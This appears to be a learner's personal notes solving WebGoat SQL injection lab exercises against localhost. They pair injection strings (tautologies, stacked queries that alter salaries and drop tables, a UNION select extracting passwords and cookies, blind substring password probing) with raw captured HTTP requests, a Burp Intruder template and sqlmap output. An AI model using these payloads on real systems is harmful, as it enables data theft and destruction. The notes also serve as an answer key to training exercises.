
Lol.
++++++++++++++++++++++++++++++++++++++

select Department from employees where first_name = 'Bob'

POST /WebGoat/SqlInjection/attack2 HTTP/1.1
Host: localhost:6969
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:6969/WebGoat/start.mvc
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 65
Connection: close
Cookie: JSESSIONID=6e4llN6TosIn1Cq-iniIjK6gUMvNvTUUxqAgDo8v

query=select+Department+from+employees+where+first_name+%3D+'Bob'

++++++++++++++++++++++++++++++++++++++

update employees set department = 'Sales' where first_name = 'Tobi'

POST /WebGoat/SqlInjection/attack3 HTTP/1.1
Host: localhost:6969
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:6969/WebGoat/start.mvc
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 77
Connection: close
Cookie: JSESSIONID=6e4llN6TosIn1Cq-iniIjK6gUMvNvTUUxqAgDo8v

query=update+employees+set+department+%3D+'Sales'+where+first_name+%3D+'Tobi'

++++++++++++++++++++++++++++++++++++++

alter table employees add phone varchar(20)

POST /WebGoat/SqlInjection/attack4 HTTP/1.1
Host: localhost:6969
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:6969/WebGoat/start.mvc
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Connection: close
Cookie: JSESSIONID=6e4llN6TosIn1Cq-iniIjK6gUMvNvTUUxqAgDo8v

query=alter+table+employees+add+phone+varchar(20)

++++++++++++++++++++++++++++++++++++++

grant alter table to UnauthorizedUser

POST /WebGoat/SqlInjection/attack5 HTTP/1.1
Host: localhost:6969
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:6969/WebGoat/start.mvc
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 43
Connection: close
Cookie: JSESSIONID=6e4llN6TosIn1Cq-iniIjK6gUMvNvTUUxqAgDo8v

query=grant+alter+table+to+UnauthorizedUser

++++++++++++++++++++++++++++++++++++++

SELECT * FROM user_data WHERE first_name = 'John' and last_name = '' or '1' = '1'

POST /WebGoat/SqlInjection/assignment5a HTTP/1.1
Host: localhost:6969
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:6969/WebGoat/start.mvc
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 42
Connection: close
Cookie: JSESSIONID=6e4llN6TosIn1Cq-iniIjK6gUMvNvTUUxqAgDo8v

account='&operator=or&injection='1'+%3D+'1

++++++++++++++++++++++++++++++++++++++

SELECT * From user_data WHERE Login_Count = 0 and userid= 0 or true
{{ login_count=9&userid=0+or+true }}

POST /WebGoat/SqlInjection/assignment5b HTTP/1.1
Host: localhost:6969
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:6969/WebGoat/start.mvc
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 30
Connection: close
Cookie: JSESSIONID=6e4llN6TosIn1Cq-iniIjK6gUMvNvTUUxqAgDo8v

login_count=9&userid=0+or+true


{{ login_count=9&userid=0+or+true }}

++++++++++++++++++++++++++++++++++++++

Employee Name  == true
Authentication == 0' or '1' = '1

POST /WebGoat/SqlInjection/attack8 HTTP/1.1
Host: localhost:6969
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:6969/WebGoat/start.mvc
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 35
Connection: close
Cookie: JSESSIONID=6e4llN6TosIn1Cq-iniIjK6gUMvNvTUUxqAgDo8v

name=true&auth_tan=0'+or+'1'+%3D+'1

++++++++++++++++++++++++++++++++++++++

'; update employees set salary = 9999999 where last_name='Smith' --

ePOST /WebGoat/SqlInjection/attack9 HTTP/1.1
Host: localhost:6969
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:6969/WebGoat/start.mvc
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 88
Connection: close
Cookie: JSESSIONID=6e4llN6TosIn1Cq-iniIjK6gUMvNvTUUxqAgDo8v

name='%3B+update+employees+set+salary+%3D+2299999+where+last_name%3D'Smith'+--&auth_tan=

(BILLIONS LOL)

++++++++++++++++++++++++++++++++++++++

'; drop table access_log --

POST /WebGoat/SqlInjection/attack10 HTTP/1.1
Host: localhost:6969
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:6969/WebGoat/start.mvc
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 43
Connection: close
Cookie: JSESSIONID=6e4llN6TosIn1Cq-iniIjK6gUMvNvTUUxqAgDo8v

action_string='%3B+drop+table+access_log+--

++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++


'; select * from user_system_data ; --

POST /WebGoat/SqlInjectionAdvanced/attack6a HTTP/1.1
Host: localhost:6969
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:6969/WebGoat/start.mvc
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 52
Connection: close
Cookie: JSESSIONID=6e4llN6TosIn1Cq-iniIjK6gUMvNvTUUxqAgDo8v

userid_6a='%3B+select+*+from+user_system_data+%3B+--

++++++++++++++++++++++++++++++++++++++

Dave' union select userid,user_name,password,cookie,null,null,null from user_system_data; --

POST /WebGoat/SqlInjectionAdvanced/attack6a HTTP/1.1
Host: localhost:6969
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:6969/WebGoat/start.mvc
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 116
Connection: close
Cookie: JSESSIONID=6e4llN6TosIn1Cq-iniIjK6gUMvNvTUUxqAgDo8v

userid_6a=Dave'+union+select+userid%2Cuser_name%2Cpassword%2Ccookie%2Cnull%2Cnull%2Cnull+from+user_system_data%3B+--

++++++++++++++++++++++++++++++++++++++

PUT /WebGoat/SqlInjectionAdvanced/challenge HTTP/1.1
Host: localhost:6969
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:6969/WebGoat/start.mvc
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 92
Connection: close
Cookie: JSESSIONID=6e4llN6TosIn1Cq-iniIjK6gUMvNvTUUxqAgDo8v

username_reg=admin&email_reg=admin%40admin.net&password_reg=admin&confirm_password_reg=admin


[16:28:57] [INFO] the back-end DBMS is HSQLDB
back-end DBMS: HSQLDB >= 1.7.2
[16:28:57] [INFO] fetching database names
[16:28:57] [INFO] fetching number of databases
[16:28:57] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:28:57] [INFO] retrieved: 
[16:28:58] [INFO] retrieved: 
[16:28:58] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 

[16:28:58] [ERROR] unable to retrieve the number of databases
[16:28:58] [INFO] falling back to current database
[16:28:58] [CRITICAL] unable to retrieve the database names
[16:28:58] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/localhost'

[*] ending @ 16:28:58 /2020-08-22/
...........................................
...........................................

tom' and substring(password,1,1)='<insert_character>

PUT /WebGoat/SqlInjectionAdvanced/challenge HTTP/1.1
Host: localhost:6969
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:6969/WebGoat/start.mvc
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 155
Connection: close
Cookie: JSESSIONID=6e4llN6TosIn1Cq-iniIjK6gUMvNvTUUxqAgDo8v

username_reg=tom'+and+substring(password%2C1%2C1)%3D'%3Cinsert_character%3E&email_reg=admin%40admin.net&password_reg=WHATEVER&confirm_password_reg=WHATEVER

PUT /WebGoat/SqlInjectionAdvanced/challenge HTTP/1.1
Host: localhost:6969
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:6969/WebGoat/start.mvc
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 134
Connection: close
Cookie: JSESSIONID=6e4llN6TosIn1Cq-iniIjK6gUMvNvTUUxqAgDo8v

username_reg=tom'+and+substring(password%2C1%2C1)%3D't&email_reg=baber%40baber.net&password_reg=WHATEVER&confirm_password_reg=WHATEVER

............................
............................
## https://www.youtube.com/watch?v=GtsHoeIlSf8

******** INTRUDER BRUTE FORCE ***********
PUT /WebGoat/SqlInjectionAdvanced/challenge HTTP/1.1
Host: localhost:6969
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:6969/WebGoat/start.mvc
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 134
Connection: close
Cookie: JSESSIONID=6e4llN6TosIn1Cq-iniIjK6gUMvNvTUUxqAgDo8v

username_reg=tom'+and+substring(password%2C1%2C1)%3D'§pass_char§&email_reg=baber%40baber.net&password_reg=WHATEVER&confirm_password_reg=WHATEVER

............................
............................ (ongoing, lol)
